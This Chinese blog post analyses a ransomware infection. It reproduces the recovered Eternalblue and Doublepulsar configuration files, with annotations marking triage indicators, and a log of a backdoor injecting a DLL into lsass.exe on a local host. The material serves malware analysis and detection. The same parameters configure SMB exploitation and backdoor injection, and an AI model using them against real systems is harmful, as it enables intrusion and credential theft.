勒索病毒与大家分享tpmagentservice.dll和TrustedHostServeces.exe

该博客详细介绍了勒索病毒如何利用tpmagentservice.dll和TrustedHostServeces.exe这两个组件,通过svchost.exe和spoolsv.exe系统进程进行恶意注入。病毒活动主要集中在C:\windows\SecureBootThemes\Microsoft及C:\windows\System32\SecureBootThemes目录下,并创建svchost.xml和spoolsv.xml配置文件,以及stage2.txt日志文件。

有大约56个DLL文件,通过svchost.exe和spoolsv.exe注入到系统进程。

会在

C:\windows\SecureBootThemes\Microsoft

C:\windows\System32\SecureBootThemes

这两个文件夹下面。

通常有两个配置文件:svchost.xml 和 spoolsv.xml,日志文件为 stage2.txt。

这是第一个配置文件 svchost.xml:


<t:config xmlns:t="urn:trch" id="0f38f55b6a88feccfb846d3d10ab4687e652e63e" configversion="2.2.0.0" name="Eternalblue" version="2.2.0" schemaversion="2.1.0">
<!--
  svchost.xml as recovered from disk: the parameter file of the module that
  names itself "Eternalblue" (name/version attributes above, schema namespace
  urn:trch). The document is reproduced unchanged; the comments only point out
  which fields are useful for triage. Per the blog text the file lives under
  C:\windows\SecureBootThemes\Microsoft or C:\windows\System32\SecureBootThemes.
-->
<t:inputparameters>
<!-- Hidden parameter; value 0 in the recovered file. -->
<t:parameter name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port" type="TcpPort" format="Scalar" hidden="true" valid="true">
<t:default>0</t:default>
<t:value>0</t:value>
</t:parameter>
<t:parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16" format="Scalar" valid="true">
<t:default>60</t:default>
<t:value>60</t:value>
</t:parameter>
<!--
  The value is the literal string %s, not an address: this looks like a
  printf-style placeholder that is filled in at runtime (compare the second
  Doublepulsar config further down the page, where TargetIp is concrete).
  NOTE(review): inferred from the placeholder; confirm against the loader.
-->
<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<t:value>%s</t:value>
</t:parameter>
<!-- TCP 445 on TargetIp: the connection a network sensor would see for this module. -->
<t:parameter name="TargetPort" description="Port used by the SMB service for exploit connection" type="TcpPort" format="Scalar" valid="true">
<t:default>445</t:default>
<t:value>445</t:value>
</t:parameter>
<t:parameter name="VerifyTarget" description="Validate the SMB string from target against the target selected before exploitation." type="Boolean" format="Scalar" valid="true">
<t:default>true</t:default>
<t:value>true</t:value>
</t:parameter>
<!-- Ties this file to the Doublepulsar config (spoolsv.xml): the backdoor is checked for before the exploit is run. -->
<t:parameter name="VerifyBackdoor" description="Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts." type="Boolean" format="Scalar" valid="true">
<t:default>true</t:default>
<t:value>true</t:value>
</t:parameter>
<t:parameter name="MaxExploitAttempts" description="Number of times to attempt the exploit and groom. Disabled for XP/2K3." type="U32" format="Scalar" valid="true">
<t:default>3</t:default>
<t:value>3</t:value>
</t:parameter>
<t:parameter name="GroomAllocations" description="Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do." type="U32" format="Scalar" valid="true">
<t:default>12</t:default>
<t:value>12</t:value>
</t:parameter>
<!-- Hidden and not required; the recovered file carries no value for it. -->
<t:parameter name="ShellcodeBuffer" description="Shellcode buffer in hex (hint: use 'F:<FILENAME>' to load from file)" type="Buffer" format="Scalar" hidden="true" required="false"></t:parameter>
<!-- Selected target profile is WIN72K8R2 (Windows 7 / 2008 R2); the log below reports a Windows 7 SP1 host. -->
<t:paramchoice name="Target" description="Operating System, Service Pack, and Architecture of target OS">
<t:value>WIN72K8R2</t:value>
<t:paramgroup name="XP" description="Windows XP 32-Bit All Service Packs"></t:paramgroup>
<t:paramgroup name="WIN72K8R2" description="Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs"></t:paramgroup>
</t:paramchoice>
</t:inputparameters>
<t:outputparameters>
<t:parameter name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" type="Boolean" format="Scalar"></t:parameter>
</t:outputparameters>
</t:config>


第二个配置文件 spoolsv.xml:


<t:config xmlns:t="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">
<!--
  spoolsv.xml as recovered from disk: the parameter file of the module that
  names itself "Doublepulsar" (same urn:trch schema as svchost.xml). The
  descriptions below say it drives a ring 0 SMB/RDP backdoor on the target.
  Reproduced unchanged; comments mark the fields relevant to triage.
-->
<t:inputparameters>
<t:parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds).  Use -1 for no timeout." type="S16" format="Scalar" valid="true">
<t:default>60</t:default>
<t:value>60</t:value>
</t:parameter>
<!-- Literal %s placeholder, as in svchost.xml; presumably substituted at runtime. -->
<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
<t:value>%s</t:value>
</t:parameter>
<t:parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">
<t:default>445</t:default>
<t:value>445</t:value>
</t:parameter>
<!-- SMB (TCP 445) is the selected transport; RDP (TCP 3389) is the alternative the schema offers. -->
<t:paramchoice name="Protocol" description="Protocol for the backdoor to speak">
<t:default>SMB</t:default>
<t:value>SMB</t:value>
<t:paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></t:paramgroup>
<t:paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></t:paramgroup>
</t:paramchoice>
<t:paramchoice name="Architecture" description="Architecture of the target OS">
<t:default>x64</t:default>
<t:value>x64</t:value>
<t:paramgroup name="x86" description="x86 32-bits"></t:paramgroup>
<t:paramgroup name="x64" description="x64 64-bits"></t:paramgroup>
</t:paramchoice>
<!--
  The value (RunDLL) differs from the default (OutputInstall): in the recovered
  file the active operation is DLL injection, so the RunDLL group below is
  the one that applies.
-->
<t:paramchoice name="Function" description="Operation for backdoor to perform">
<t:default>OutputInstall</t:default>
<t:value>RunDLL</t:value>
<t:paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">
<t:parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="Ping" description="Test for presence of backdoor"></t:paramgroup>
<t:paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">
<!-- Placeholder here; the concrete path appears in the config echoed after the log. -->
<t:parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">
<t:value>%s</t:value>
</t:parameter>
<t:parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">
<t:default>0</t:default>
<t:value>1</t:value>
</t:parameter>
<!--
  Injection target recorded in the file is lsass.exe. NOTE(review): the blog
  text says the injection goes "via svchost.exe and spoolsv.exe"; those names
  match the config file names (svchost.xml / spoolsv.xml) rather than this
  field, so on the host side a foreign DLL loaded into lsass.exe is the
  indicator to look for. Confirm against the actual samples.
-->
<t:parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">
<t:default>lsass.exe</t:default>
<t:value>lsass.exe</t:value>
</t:parameter>
<t:parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">
<t:default></t:default>
<t:value></t:value>
</t:parameter>
</t:paramgroup>
<t:paramgroup name="RunShellcode" description="Run raw shellcode">
<t:parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></t:parameter>
<t:parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="Uninstall" description="Remove's backdoor from system"></t:paramgroup>
</t:paramchoice>
</t:inputparameters>
<t:outputparameters>
<t:paramchoice name="Function" description="Operation for backdoor to perform">
<t:paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">
<t:parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></t:parameter>
<t:parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="Ping" description="Test for presence of backdoor">
<t:parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">
<t:parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></t:parameter>
</t:paramgroup>
<t:paramgroup name="Uninstall" description="Remove's backdoor from system">
<t:parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></t:parameter>
</t:paramgroup>
</t:paramchoice>
</t:outputparameters>
</t:config>

日志文件 stage2.txt 的内容如下:

[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
	[+] Backdoor returned code: 10 - Success!
	[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x9B2F0DCD
    SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1
    Target OS is: 7 x86
    Target SP is: 1
	[+] Backdoor installed
	[+] DLL built
	[.] Sending shellcode to inject DLL
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Command completed successfully
<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">
  <!--
    Same Doublepulsar parameter set (identical id/version) but with concrete
    values filled in, and with extra LogFile/OutConfig/ValidateOnly parameters
    that spoolsv.xml does not carry. It follows the stage2.txt log lines and
    OutConfig is "stdout", which is consistent with it being the module's own
    echo of its effective parameters. NOTE(review): that is an inference from
    the surrounding text, not something the file states.
  -->
  <inputparameters>
    <parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds).  Use -1 for no timeout." type="S16" format="Scalar" valid="true">
      <default>60</default>
      <value>60</value>
    </parameter>
    <!-- Private-range (RFC 1918) address: this run was aimed at a host on the local network. -->
    <parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">
      <value>192.168.1.81</value>
    </parameter>
    <parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">
      <default>445</default>
      <value>445</value>
    </parameter>
    <parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>
    <parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">
      <default>stdout</default>
      <value>stdout</value>
    </parameter>
    <parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">
      <default>false</default>
      <value>false</value>
    </parameter>
    <paramchoice name="Protocol" description="Protocol for the backdoor to speak">
      <default>SMB</default>
      <value>SMB</value>
      <paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>
      <paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>
    </paramchoice>
    <!--
      NOTE(review): value is x64, yet the log above reports "Target
      architecture: x86 (32-bit)" and the payload below is x86.dll. The tool may
      take the real architecture from the Ping reply; treat this field as
      unreliable for triage until confirmed.
    -->
    <paramchoice name="Architecture" description="Architecture of the target OS">
      <default>x64</default>
      <value>x64</value>
      <paramgroup name="x86" description="x86 32-bits"></paramgroup>
      <paramgroup name="x64" description="x64 64-bits"></paramgroup>
    </paramchoice>
    <!-- Active operation is RunDLL (value), not the OutputInstall default. -->
    <paramchoice name="Function" description="Operation for backdoor to perform">
      <default>OutputInstall</default>
      <value>RunDLL</value>
      <paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">
        <parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>
      </paramgroup>
      <paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>
      <paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">
        <!--
          Host-side indicator: x86.dll under C:\Windows\SecureBootThemes\Microsoft,
          the directory the blog names. The doubled backslash before x86.dll is
          reproduced as recorded.
        -->
        <parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">
          <value>C:\Windows\SecureBootThemes\Microsoft\\x86.dll</value>
        </parameter>
        <parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">
          <default>0</default>
          <value>1</value>
        </parameter>
        <!-- The DLL above is loaded into lsass.exe on the target; that process is where to look for it. -->
        <parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">
          <default>lsass.exe</default>
          <value>lsass.exe</value>
        </parameter>
        <parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">
          <default></default>
          <value></value>
        </parameter>
      </paramgroup>
      <paramgroup name="RunShellcode" description="Run raw shellcode">
        <parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>
        <parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>
      </paramgroup>
      <paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>
    </paramchoice>
  </inputparameters>
  <outputparameters>
    <paramchoice name="Function" description="Operation for backdoor to perform">
      <paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">
        <parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>
        <parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>
      </paramgroup>
      <paramgroup name="Ping" description="Test for presence of backdoor">
        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
      </paramgroup>
      <paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">
        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
      </paramgroup>
      <paramgroup name="Uninstall" description="Remove's backdoor from system">
        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>
      </paramgroup>
    </paramchoice>
  </outputparameters>
</config>


